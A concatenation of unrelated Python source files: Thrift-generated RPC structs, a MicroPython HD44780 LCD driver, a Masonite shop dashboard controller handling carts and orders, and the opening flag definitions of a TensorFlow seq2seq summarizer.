        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
all_structs.append(WriteCastInfo_args)
WriteCastInfo_args.thrift_spec = (
    None,  # 0
    (1, TType.I64, 'req_id', None, None, ),  # 1
    (2, TType.I64, 'cast_info_id', None, None, ),  # 2
    (3, TType.STRING, 'name', 'UTF8', None, ),  # 3
    (4, TType.BOOL, 'gender', None, None, ),  # 4
    (5, TType.STRING, 'intro', 'UTF8', None, ),  # 5
    (6, TType.MAP, 'carrier', (TType.STRING, 'UTF8', TType.STRING, 'UTF8', False), None, ),  # 6
)
class WriteCastInfo_result(object):
    """
    Thrift-generated result struct for WriteCastInfo (void return; `se` carries
    a declared service exception, if any).

    Attributes:
     - se
    """

    def __init__(self, se=None,):
        self.se = se

    def read(self, iprot):
        # Fast path: use the C-accelerated decoder when available.
        if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
            iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 1:
                if ftype == TType.STRUCT:
                    self.se = ServiceException()
                    self.se.read(iprot)
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        if oprot._fast_encode is not None and self.thrift_spec is not None:
            oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
            return
        oprot.writeStructBegin('WriteCastInfo_result')
        if self.se is not None:
            oprot.writeFieldBegin('se', TType.STRUCT, 1)
            self.se.write(oprot)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
all_structs.append(WriteCastInfo_result)
WriteCastInfo_result.thrift_spec = (
    None,  # 0
    (1, TType.STRUCT, 'se', [ServiceException, None], None, ),  # 1
)
class ReadCastInfo_args(object):
"""
Attributes:
- req_id
- cast_ids
- carrier
"""
def __init__(self, req_id=None, cast_ids=None, carrier=None,):
self.req_id = req_id
self.cast_ids = cast_ids
self.carrier = carrier
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.req_id = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.LIST:
self.cast_ids = []
(_etype271, _size268) = iprot.readListBegin()
for _i272 in range(_size268):
_elem273 = iprot.readI64()
self.cast_ids.append(_elem273)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.MAP:
self.carrier = {}
(_ktype275, _vtype276, _size274) = iprot.readMapBegin()
for _i278 in range(_size274):
_key279 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
_val280 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
self.carrier[_key279] = _val280
iprot.readMapEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('ReadCastInfo_args')
if self.req_id is not None:
oprot.writeFieldBegin('req_id', TType.I64, 1)
oprot.writeI64(self.req_id)
oprot.writeFieldEnd()
if self.cast_ids is not None:
oprot.writeFieldBegin('cast_ids', TType.LIST, 2)
oprot.writeListBegin(TType.I64, len(self.cast_ids))
for iter281 in self.cast_ids:
oprot.writeI64(iter281)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.carrier is not None:
oprot.writeFieldBegin('carrier', TType.MAP, 3)
oprot.writeMapBegin(TType.STRING, TType.STRING, len(self.carrier))
for kiter282, viter283 in self.carrier.items():
oprot.writeString(kiter282.encode('utf-8') if sys.version_info[0] == 2 else kiter282)
oprot.writeString(viter283.encode('utf-8') if sys.version_info[0] == 2 else viter283)
oprot.writeMapEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
    """Structural equality: same class and identical attribute dicts."""
    if not isinstance(other, self.__class__):
        return False
    return self.__dict__ == other.__dict__
def __ne__(self, other):
    """Inequality is defined as the negation of equality."""
    return not self == other
# Register the struct for spec fix-up and attach its wire-format field spec:
# each entry is (field id, wire type, name, nested type info, default value).
all_structs.append(ReadCastInfo_args)
ReadCastInfo_args.thrift_spec = (
    None,  # 0
    (1, TType.I64, 'req_id', None, None, ),  # 1
    (2, TType.LIST, 'cast_ids', (TType.I64, None, False), None, ),  # 2
    (3, TType.MAP, 'carrier', (TType.STRING, 'UTF8', TType.STRING, 'UTF8', False), None, ),  # 3
)
class ReadCastInfo_result(object):
    """Thrift result struct for the ReadCastInfo RPC.

    Attributes:
     - success: list of CastInfo structs returned on success (field id 0)
     - se: ServiceException set when the server raised one (field id 1)
    """

    def __init__(self, success=None, se=None,):
        self.success = success
        self.se = se

    def read(self, iprot):
        """Deserialize this struct in place from the given input protocol."""
        # Fast path: C-accelerated decoder when the transport supports it.
        if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
            iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 0:
                if ftype == TType.LIST:
                    self.success = []
                    (_etype287, _size284) = iprot.readListBegin()
                    for _i288 in range(_size284):
                        _elem289 = CastInfo()
                        _elem289.read(iprot)
                        self.success.append(_elem289)
                    iprot.readListEnd()
                else:
                    # Wrong wire type for this field id: skip it.
                    iprot.skip(ftype)
            elif fid == 1:
                if ftype == TType.STRUCT:
                    self.se = ServiceException()
                    self.se.read(iprot)
                else:
                    iprot.skip(ftype)
            else:
                # Unknown field id: skip for forward compatibility.
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        """Serialize this struct to the given Thrift output protocol."""
        # Fast path: use the C-accelerated encoder when it is available.
        if oprot._fast_encode is not None and self.thrift_spec is not None:
            oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
            return
        oprot.writeStructBegin('ReadCastInfo_result')
        if self.success is not None:
            oprot.writeFieldBegin('success', TType.LIST, 0)
            oprot.writeListBegin(TType.STRUCT, len(self.success))
            for iter290 in self.success:
                iter290.write(oprot)
            oprot.writeListEnd()
            oprot.writeFieldEnd()
        if self.se is not None:
            oprot.writeFieldBegin('se', TType.STRUCT, 1)
            self.se.write(oprot)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        """No validation rules are defined for this struct."""
        return

    def __repr__(self):
        """Return a debug string of the form ClassName(attr=value, ...)."""
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        """Structural equality: same class and identical attribute dicts."""
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Inequality is defined as the negation of equality."""
        return not (self == other)
# Register the result struct and its wire-format spec, then resolve every
# collected spec in place and drop the temporary registry.
all_structs.append(ReadCastInfo_result)
ReadCastInfo_result.thrift_spec = (
    (0, TType.LIST, 'success', (TType.STRUCT, [CastInfo, None], False), None, ),  # 0
    (1, TType.STRUCT, 'se', [ServiceException, None], None, ),  # 1
)
fix_spec(all_structs)
del all_structs
|
<reponame>dnisbet/python_lcd<filename>lcd/machine_gpio_lcd.py
"""Implements a HD44780 character LCD connected via pyboard GPIO pins."""
from lcd_api import LcdApi
from machine import Pin
import time, utime
class GpioLcd(LcdApi):
    """Implements a HD44780 character LCD connected via GPIO pins.

    Supports both the 4-bit (D4-D7) and 8-bit (D0-D7) parallel interfaces
    of the HD44780 controller.
    """

    def __init__(self, rs_pin, enable_pin, d0_pin=None, d1_pin=None,
                 d2_pin=None, d3_pin=None, d4_pin=None, d5_pin=None,
                 d6_pin=None, d7_pin=None, rw_pin=None, backlight_pin=None,
                 num_lines=2, num_columns=16):
        """Constructs the GpioLcd object. All of the pin arguments must be
        machine.Pin objects which describe which pin the given line from
        the LCD is connected to.

        When used in 4-bit mode, only D4, D5, D6, and D7 are physically
        connected to the LCD panel. This function allows you to call it like
        GpioLcd(rs, enable, D4, D5, D6, D7) and it will interpret that as
        if you had actually called:
        GpioLcd(rs, enable, d4=D4, d5=D5, d6=D6, d7=D7)

        To enable 8-bit mode, you need to pass d0 through d7.

        The rw pin isn't used by this library, but if you specify it, then
        it will be set low.
        """
        self.rs_pin = rs_pin
        self.enable_pin = enable_pin
        self.rw_pin = rw_pin
        self.backlight_pin = backlight_pin
        self._4bit = True
        if d4_pin and d5_pin and d6_pin and d7_pin:
            # All of d4-d7 given explicitly: keep pins as passed; 8-bit mode
            # only when d0-d3 were supplied as well.
            self.d0_pin = d0_pin
            self.d1_pin = d1_pin
            self.d2_pin = d2_pin
            self.d3_pin = d3_pin
            self.d4_pin = d4_pin
            self.d5_pin = d5_pin
            self.d6_pin = d6_pin
            self.d7_pin = d7_pin
            if self.d0_pin and self.d1_pin and self.d2_pin and self.d3_pin:
                self._4bit = False
        else:
            # This is really 4-bit mode, and the 4 data pins were just
            # passed as the first 4 arguments, so we switch things around.
            self.d0_pin = None
            self.d1_pin = None
            self.d2_pin = None
            self.d3_pin = None
            self.d4_pin = d0_pin
            self.d5_pin = d1_pin
            self.d6_pin = d2_pin
            self.d7_pin = d3_pin
        # Drive all control/data lines low as outputs before talking to the LCD.
        self.rs_pin.init(Pin.OUT)
        self.rs_pin.low()
        if self.rw_pin:
            self.rw_pin.init(Pin.OUT)
            self.rw_pin.low()
        self.enable_pin.init(Pin.OUT)
        self.enable_pin.low()
        self.d4_pin.init(Pin.OUT)
        self.d5_pin.init(Pin.OUT)
        self.d6_pin.init(Pin.OUT)
        self.d7_pin.init(Pin.OUT)
        self.d4_pin.low()
        self.d5_pin.low()
        self.d6_pin.low()
        self.d7_pin.low()
        if not self._4bit:
            self.d0_pin.init(Pin.OUT)
            self.d1_pin.init(Pin.OUT)
            self.d2_pin.init(Pin.OUT)
            self.d3_pin.init(Pin.OUT)
            self.d0_pin.low()
            self.d1_pin.low()
            self.d2_pin.low()
            self.d3_pin.low()
        if self.backlight_pin is not None:
            self.backlight_pin.init(Pin.OUT)
            self.backlight_pin.low()
        # TODO: see about splitting this init sequence into a begin() method.
        utime.sleep_ms(20)   # Allow LCD time to powerup
        # Send reset 3 times (HD44780 software-reset sequence).
        self.hal_write_init_nibble(self.LCD_FUNCTION_RESET)
        utime.sleep_ms(5)    # Need to sleep at least 4.1 msec after first reset
        self.hal_write_init_nibble(self.LCD_FUNCTION_RESET)
        utime.sleep_ms(1)
        self.hal_write_init_nibble(self.LCD_FUNCTION_RESET)
        utime.sleep_ms(1)
        cmd = self.LCD_FUNCTION
        if not self._4bit:
            cmd |= self.LCD_FUNCTION_8BIT
        self.hal_write_init_nibble(cmd)
        utime.sleep_ms(1)
        LcdApi.__init__(self, num_lines, num_columns)
        if num_lines > 1:
            cmd |= self.LCD_FUNCTION_2LINES
        self.hal_write_command(cmd)

    def hal_pulse_enable(self):
        """Pulse the enable line high, and then low again.

        Data is latched by the LCD on the falling edge of E.
        """
        self.enable_pin.low()
        utime.sleep_ms(1)
        self.enable_pin.high()
        utime.sleep_ms(1)    # Enable pulse needs to be > 450 nsec
        self.enable_pin.low()
        # Commands need > 37us to settle.
        # NOTE(review): 100 ms is orders of magnitude longer than the 37 us
        # mentioned above — possibly meant utime.sleep_us(100); confirm
        # against the upstream python_lcd driver before changing.
        utime.sleep_ms(100)

    def hal_write_init_nibble(self, nibble):
        """Writes an initialization nibble (upper 4 bits) to the LCD.

        This particular function is only used during initialization.
        """
        self.hal_write_4bits(nibble >> 4)

    def hal_backlight_on(self):
        """Allows the hal layer to turn the backlight on."""
        if self.backlight_pin:
            self.backlight_pin.high()

    def hal_backlight_off(self):
        """Allows the hal layer to turn the backlight off."""
        if self.backlight_pin:
            self.backlight_pin.low()

    def hal_write_command(self, cmd):
        """Writes a command byte to the LCD (RS low)."""
        self.rs_pin.low()
        self.hal_write_8bits(cmd)
        if cmd <= 3:
            # The home and clear commands require a worst
            # case delay of 4.1 msec.
            utime.sleep_ms(5)

    def hal_write_data(self, data):
        """Write a data byte to the LCD (RS high)."""
        self.rs_pin.high()
        self.hal_write_8bits(data)

    def hal_write_8bits(self, value):
        """Writes 8 bits of data to the LCD.

        In 4-bit mode the byte is sent as two nibbles (high first); in 8-bit
        mode d0-d3 are set directly and the final hal_write_4bits call sets
        d4-d7 and pulses enable once.
        """
        if self.rw_pin:
            self.rw_pin.low()
        if self._4bit:
            self.hal_write_4bits(value >> 4)
            self.hal_write_4bits(value)
        else:
            self.d3_pin.value(value & 0x08)
            self.d2_pin.value(value & 0x04)
            self.d1_pin.value(value & 0x02)
            self.d0_pin.value(value & 0x01)
            self.hal_write_4bits(value >> 4)

    def hal_write_4bits(self, nibble):
        """Writes 4 bits of data onto d4-d7 and latches them with enable."""
        self.d7_pin.value(nibble & 0x08)
        self.d6_pin.value(nibble & 0x04)
        self.d5_pin.value(nibble & 0x02)
        self.d4_pin.value(nibble & 0x01)
        self.hal_pulse_enable()
|
<reponame>krishotte/web_sperky<gh_stars>0
"""A DashboardController Module."""
from masonite.request import Request
from masonite.view import View
from masonite.controllers import Controller
from .PortfolioController import get_user
from .auth.LoginController import get_caller_path
from app.Product import Product
from app.Order import Order
from .EditPortfolioController import add_image_path
from app.User import User
from app.Address import Address
from app.Shipping import Shipping
from app.OrderState import OrderState
from masonite import env
import pendulum
import json
from app.Variant import Variant
from .PortfolioController import get_settings
from masonite import Mail
from app.mailable.AdminsNewOrderMailable import AdminsNewOrderMailable
from threading import Thread
import time
class DashboardController(Controller):
    """User dashboard: profile, orders, cart handling and the checkout flow.

    Every handler resolves the logged-in user via get_user(request) and
    renders templates under dash/.  Cart state lives in the session under
    'ordered_items' as a JSON list of {'product_id'[, 'variant_id']} dicts.
    """

    def __init__(self, request: Request):
        """DashboardController Initializer

        Arguments:
            request {masonite.request.Request} -- The Masonite Request class.
        """
        self.request = request

    def show(self, request: Request, view: View):
        """Render the dashboard landing page (profile view)."""
        user = get_user(request)
        user_ = User.where('email', '=', user['email']).first()
        user_.addresses()  # touch the relation so it serializes with the model
        return view.render('dash/profile', {
            'user': user,
            'user_': user_,
            'settings': get_settings(),
        })

    def show_profile(self, request: Request, view: View):
        """Render the profile page with the user's saved addresses."""
        user = get_user(request)
        user_ = User.where('email', '=', user['email']).first()
        user_.addresses()
        if user_.verified_at is not None:
            print(f' user verified')
        print(f' APP_URL: {request.header("APP_URL")}')
        return view.render('dash/profile', {
            'user': user,
            'user_': user_,
            'settings': get_settings(),
        })

    def show_orders(self, request: Request, view: View):
        """List the authenticated user's orders, newest first."""
        user = get_user(request)
        orders = request.user().orders().order_by('id', 'desc').get()
        orders.load('order_state')
        for order in orders:
            print(f' datetime: {order.created_at.strftime("%Y-%m-%d")}')
        print(f' your orders: {orders.serialize()}')
        return view.render('dash/orders', {
            'user': user,
            'orders': orders.serialize(),
            'settings': get_settings(),
        })

    def show_single_order(self, request: Request, view: View):
        """Show one order with its products; only visible to the order's owner."""
        user = get_user(request)
        order = Order.find(request.param('order_id'))
        # Touch relations so they are included when the order is serialized.
        order.address
        order.shipping
        order.order_state
        print(f' order to display: {order.serialize()}')
        for product in order.products:
            if product.pivot.variant_id:
                # Restrict the loaded variants to the one actually ordered.
                product.load({
                    'variants': Variant.query().where('id', '=', product.pivot.variant_id)
                })
        serialized_products = add_image_path(order.products.serialize())
        print(f' products: {serialized_products}')
        if order.user.email == user['email']:
            return view.render('dash/single_order', {
                'user': user,
                'order': order.serialize(),
                'products': serialized_products,
                'settings': get_settings(),
            })
        else:
            print(f' not your order')
            return request.redirect('/dashboard/orders')

    # cart control methods

    def show_cart(self, request: Request, view: View):
        """Render the cart with unique items, per-item counts and a total."""
        user = get_user(request)
        try:
            items = request.session.get('ordered_items')
            print(f' cart contains: {items}')
            unique_items = items_to_unique(items)
            print(f' unique items: {unique_items}')
        except Exception:
            # Fix: the original re-raised here, which made this fallback
            # unreachable and crashed the page instead of showing an empty cart.
            unique_items = []
        total_price = 0
        serialized_products, total_price = evaluate_cart(unique_items, total_price)
        request.session.set('total_price', total_price)
        return view.render('dash/cart', {
            'user': user,
            'ordered_items': unique_items,
            'products': serialized_products,
            'total_price': total_price,
            'settings': get_settings(),
        })

    def add_to_cart(self, request: Request):
        """Obsolete — not used.

        Items to order were held in the session as a plain list of product
        ids; items can appear in the list multiple times.
        """
        caller = get_caller_path(request)
        if request.session.has('ordered_items'):
            items = request.session.get('ordered_items')
            items.append(int(request.param('product_id')))
            request.session.set('ordered_items', items)
        else:
            request.session.set('ordered_items', [int(request.param('product_id'))])
        request.session.flash('success', 'Produkt bol pridaný do košíka')
        print(f' session : {request.session.all()}')
        return request.redirect(caller)

    def add_to_cart2(self, request: Request):
        """Add a product (optionally with a variant) to the session cart.

        Products that define variants may only be added together with a
        selected variant; otherwise the user is warned and nothing changes.
        """
        caller = get_caller_path(request)
        product_id = int(request.input('product_id'))
        print(f' request: {request.all()}')
        product = Product.find(product_id)
        product.variants  # touch the relation so it is loaded
        if len(product.variants) > 0:
            if request.has('variant_id'):
                # Fix: parse variant_id only when it was actually submitted;
                # the original converted the possibly-missing input up front.
                variant_id = int(request.input('variant_id'))
                print(f' variant required, variant selected')
                if request.session.has('ordered_items'):
                    items = request.session.get('ordered_items')
                    items.append({
                        'product_id': product_id,
                        'variant_id': variant_id,
                    })
                    request.session.set('ordered_items', json.dumps(items))
                else:
                    request.session.set('ordered_items', json.dumps([{
                        'product_id': product_id,
                        'variant_id': variant_id,
                    }]))
                request.session.flash('success', 'Produkt bol pridaný do košíka')
            else:
                # Product requires a variant but none was selected.
                print(f' variant required, but not found')
                request.session.flash('warning', 'Prosím vyberte si variant produktu')
        else:
            # Product has no variants: order it directly.
            if request.session.has('ordered_items'):
                items = request.session.get('ordered_items')
                print(f' items: {items}')
                items.append({
                    'product_id': product_id,
                })
                request.session.set('ordered_items', json.dumps(items))
            else:
                request.session.set('ordered_items', json.dumps([{
                    'product_id': product_id,
                }]))
            request.session.flash('success', 'Produkt bol pridaný do košíka')
        return request.redirect(caller)

    def remove_from_cart(self, request: Request, view: View):
        """Remove one cart entry, matched by product id and optional variant id."""
        caller = get_caller_path(request)
        ordered_items = request.session.get('ordered_items')
        print(f' ordered items before del: {ordered_items}')
        if request.has('variant_id'):
            item_to_remove = {
                'product_id': int(request.input('item_to_remove')),
                'variant_id': int(request.input('variant_id')),
            }
        else:
            item_to_remove = {'product_id': int(request.input('item_to_remove'))}
        index_of_item = ordered_items.index(item_to_remove)
        ordered_items.pop(index_of_item)
        print(f' ordered items after del: {ordered_items}')
        request.session.set('ordered_items', json.dumps(ordered_items))
        return request.redirect(caller)

    # order control methods

    def order_show_user_details(self, request: Request, view: View):
        """First step of the order: user selects the delivery address."""
        user = get_user(request)
        user_ = User.where('email', '=', user['email']).first()
        user_.addresses()
        print(f' user addresses: {user_.addresses.serialize()}')
        return view.render('dash/order/user_data', {
            'user': user,
            'user_': user_,
            'settings': get_settings(),
        })

    def order_set_user_address(self, request: Request):
        """Store the chosen delivery address id in the session, then go to shipping."""
        address_id = int(request.input('address_id'))
        address = Address.find(address_id)
        print(f' address to use: {address.serialize()}')
        request.session.set('address', address.id)
        return request.redirect('/order-shipping')

    def order_show_shipping(self, request: Request, view: View):
        """Show shipping and payment options; also reachable back from review."""
        user = get_user(request)
        user_ = User.where('email', '=', user['email']).first()
        user_.addresses()
        shippings = Shipping.all()
        payments = [
            {'name': 'V hotovosti pri prebratí tovaru'},
            {'name': 'Bankovým prevodom'},
        ]
        return view.render('dash/order/shipping', {
            'user': user,
            'user_': user_,
            'shippings': shippings,
            'payments': payments,
            'settings': get_settings(),
        })

    def order_set_shipping(self, request: Request):
        """Save the selected shipping id to the session; go to order review."""
        request.session.set('shipping', int(request.input('shipping_id')))
        return request.redirect('/order-review')

    def order_back_to_shipping(self, request: Request):
        """Save the order note to the session; go back to shipping selection."""
        note = request.input('note')
        print(f' saving note to session: {note}')
        request.session.set('note', note)
        return request.redirect('/order-shipping')

    def order_review(self, request: Request, view: View):
        """Show the order review: items, totals, shipping, address and note."""
        user = get_user(request)
        user_ = User.where('email', '=', user['email']).first()
        shipping = Shipping.find(int(request.session.get('shipping')))
        address = Address.find(int(request.session.get('address')))
        items = request.session.get('ordered_items')
        unique_items = items_to_unique(items)
        note = request.session.get('note')
        total_price = shipping.price
        serialized_products, total_price = evaluate_cart(unique_items, total_price)
        request.session.set('total_price', total_price)
        return view.render('dash/order/review_order', {
            'user': user,
            # Fix: pass the fetched User model (previously the session dict
            # was passed here and user_ went unused, unlike sibling views).
            'user_': user_,
            'ordered_items': unique_items,
            'products': serialized_products,
            'total_price': total_price,
            'shipping': shipping,
            'address': address,
            'note': note,
            'settings': get_settings(),
        })

    def make_order(self, request: Request, mail: Mail):
        """Create an Order from the session cart, notify admins, clear the session."""
        print(f' session: {request.session.all()}')
        shipping = Shipping.find(int(request.session.get('shipping')))
        address = Address.find(int(request.session.get('address')))
        items = request.session.get('ordered_items')
        unique_items = items_to_unique(items)
        note = request.input('note')
        total_price = float(request.session.get('total_price'))
        products = []
        try:
            for each in unique_items:
                product = Product.find(each['product_id'])
                if 'variant_id' in each:
                    product.load({
                        'variants': Variant.query().where('id', '=', each['variant_id'])
                    })
                products.append(product)
        except Exception:
            pass
        print(f' products1: {products}')
        # let's make an order
        order = Order(total_price=total_price, note=note)
        order.user().associate(request.user())
        order_state = OrderState.where('phase', '=', 1).first()
        order.order_state().associate(order_state)
        order.shipping().associate(shipping)
        order.address().associate(address)
        # save first so the autoincrement id exists for the order name
        order.save()
        order.name = f"{pendulum.now().format('%Y')}{str(order.id).zfill(4)}"
        order.save()
        print(f' order saved')
        for index, product in enumerate(products):
            if len(product.variants) > 0:
                if product.variants[0].price:
                    product_price = product.variants[0].price
                else:
                    product_price = product.price
                # NOTE(review): assumes the cart entry carries 'variant_id'
                # whenever the product defines variants; a variant-less entry
                # for such a product would raise KeyError here — confirm.
                order.products().attach(product, {
                    'product_count': unique_items[index]['count'],
                    'unit_price': product_price,
                    'variant_id': unique_items[index]['variant_id'],
                })
            else:
                order.products().attach(product, {
                    'product_count': unique_items[index]['count'],
                    'unit_price': product.price,
                })
        # send notification to admins from a background thread
        admins = User.where('role_id', '=', 1).get()
        emails = []
        for admin in admins:
            emails.append(AdminsNewOrderMailable(admin.email, order))
        thr1 = Thread(target=admin_send_order_notification, args=[mail, emails])
        thr1.start()
        # clear session (cart, shipping, address, note, totals)
        request.session.reset()
        return request.redirect('/dashboard/orders')

    # user address control methods

    def show_new_address(self, request: Request, view: View):
        """Show the form for adding a new user address."""
        user = get_user(request)
        print(f' logged in user: {user}')
        return view.render('dash/new_address', {
            'user': user,
            'settings': get_settings(),
        })

    def store_new_address(self, request: Request):
        """Persist a new address for the logged-in user."""
        user = get_user(request)
        print(f' logged in user: {user}')
        user_ = User.where('email', '=', user['email']).first_or_fail()
        address1 = Address(
            street=request.input('street'),
            zip_code=request.input('zip_code'),
            city=request.input('city'),
            name=request.input('name'),
            phone=request.input('phone'),
        )
        print(f' address to store: {address1}')
        user_.addresses().save(address1)
        return request.redirect('/dashboard/profile')

    def show_existing_address(self, request: Request, view: View):
        """Show the edit form for an address; only to the address owner."""
        user = get_user(request)
        print(f' logged in user: {user}')
        address_id = request.param('address_id')
        address_ = Address.find(address_id)
        if address_.user.email == user['email']:
            print(f' your address')
            return view.render('dash/existing_address', {
                'user': user,
                'address': address_,
                'settings': get_settings(),
            })
        else:
            print(f' not your address')
            return request.redirect('/dashboard')

    def store_existing_address(self, request: Request):
        """Update an existing address from the submitted form values."""
        user = get_user(request)
        print(f' logged in user: {user}')
        user_ = User.where('email', '=', user['email']).first_or_fail()
        address1 = Address.find(request.input('id'))
        address1.street = request.input('street')
        address1.zip_code = request.input('zip_code')
        address1.city = request.input('city')
        address1.name = request.input('name')
        address1.phone = request.input('phone')
        print(f' address to store: {address1.serialize()}')
        address1.save()
        return request.redirect('/dashboard/profile')

    def delete_address(self, request: Request):
        """Delete an address; only permitted for the address owner."""
        user = get_user(request)
        print(f' logged in user: {user}')
        address_id = request.param('address_id')
        address_ = Address.find(address_id)
        if address_.user.email == user['email']:
            print(f' your address, deleting ...')
            address_.delete()
            return request.redirect('/dashboard/profile')
        else:
            print(f' not your address')
            return request.redirect('/dashboard')
def items_to_unique(items):
    """Collapse *items* into a list of unique entries annotated with counts.

    Each distinct entry (compared by equality) appears once in the result,
    carrying a 'count' key with its number of occurrences.  The dicts in the
    result are the same objects as in *items*, so the input entries are
    mutated in place.  Any error (e.g. *items* is None, or entries are not
    dicts) is swallowed and whatever was annotated so far is returned —
    typically an empty list.
    """
    unique_entries = []
    counts = []
    annotated = []
    try:
        for entry in items:
            if entry not in unique_entries:
                unique_entries.append(entry)
                counts.append(items.count(entry))
        for entry, tally in zip(unique_entries, counts):
            entry['count'] = tally
            annotated.append(entry)
    except Exception:
        pass
    return annotated
def evaluate_cart(unique_items, total_price):
    """Resolve cart entries into serialized products and a running total.

    :param unique_items: list of {'product_id', 'count'[, 'variant_id']}
        dicts, as produced by items_to_unique()
    :param total_price: starting total (e.g. 0, or the shipping price)
    :return: (serialized_products, total) — on any error an empty product
        list is returned together with the total accumulated so far
    """
    total_price_ = total_price
    products = []
    try:
        for each in unique_items:
            product = Product.find(each['product_id'])
            if 'variant_id' in each:
                # load variant if selected
                product.load({
                    'variants': Variant.query().where('id', '=', each['variant_id'])
                })
                if product.variants[0].price:
                    # count in variant price if it exists, else fall back
                    # to the base product price
                    total_price_ += product.variants[0].price * each['count']
                else:
                    total_price_ += product.price * each['count']
            else:
                total_price_ += product.price * each['count']
            products.append(product.serialize())
        print(f' products: {products}')
        print(f' total price: {total_price_}')
        serialized_products = add_image_path(products)
    except Exception:
        # Best-effort: a malformed cart entry yields an empty product list.
        # NOTE(review): total_price_ may already include some items when this
        # triggers mid-loop — confirm callers tolerate the partial total.
        serialized_products = []
    return serialized_products, total_price_
def admin_send_order_notification(mail, emails):
    """Send the given mailables one by one, pausing between sends.

    Runs on a background thread (spawned in make_order) so the request
    thread is not blocked by SMTP latency.
    """
    print(f' sending order notification to admins from another thread')
    for mailable in emails:
        mail.mailable(mailable).send()
        time.sleep(2)  # throttle so the mail server is not hammered
|
<filename>seq2seq_attention.py<gh_stars>1-10
'''
This is a seq2seq model (hierarchical encoder - decoder) with
constrained hierarchical attention (word-level attention + sent-level attention).
The constraints are from the results of extractive summarization.
'''
import sys
import time
import os
import tensorflow as tf
import batch_reader
import data
import seq2seq_attention_decode
import seq2seq_attention_model
import numpy as np
FLAGS = tf.app.flags.FLAGS

# --- Input data paths ---
tf.app.flags.DEFINE_string('article_path',
                           '', 'Path expression to source articles.')
tf.app.flags.DEFINE_string('abstract_path',
                           '', 'Path expression to target abstracts.')
tf.app.flags.DEFINE_string('vocab_path',
                           '', 'Path expression to article text vocabulary file.')
tf.app.flags.DEFINE_string('prob_path',
                           '', "Path expression to source articles' probabilities for extractive summary")
tf.app.flags.DEFINE_string('label_path',
                           '', 'Path expression to labels of extractive summarization.')
tf.app.flags.DEFINE_string('emb_path',
                           '', 'Path expression to pre-trained word embedding.')
tf.app.flags.DEFINE_integer('emb_dim',
                            300, 'Dimension of word embedding.')

# --- Output / logging directories ---
# NOTE(review): _Tag() below reads FLAGS.tagging_dir, which is not DEFINEd
# here — presumably registered by another module; verify before running
# in 'tag' mode.
tf.app.flags.DEFINE_string('log_root', '', 'Directory for model root.')
tf.app.flags.DEFINE_string('train_dir', '', 'Directory for train.')
tf.app.flags.DEFINE_string('eval_dir', '', 'Directory for eval.')
tf.app.flags.DEFINE_string('decode_dir', '', 'Directory for decode summaries.')

# --- Run configuration ---
tf.app.flags.DEFINE_string('mode', 'train', 'train/eval/decode/tag mode')
tf.app.flags.DEFINE_integer('max_run_steps', 10000000,
                            'Maximum number of run steps.')
tf.app.flags.DEFINE_integer('article_sentences_num', 35,
                            'Number of sentences to use from the '
                            'article.')
tf.app.flags.DEFINE_integer('max_article_sentences_length', 50,
                            'Length of each sentence to use from the '
                            'article.')
tf.app.flags.DEFINE_integer('abstract_length', 100,
                            'Max number of first sentences to use from the '
                            'abstract.')
tf.app.flags.DEFINE_integer('beam_size', 5,
                            'beam size for beam search decoding.')
tf.app.flags.DEFINE_integer('eval_interval_secs', 60, 'How often to run eval.')
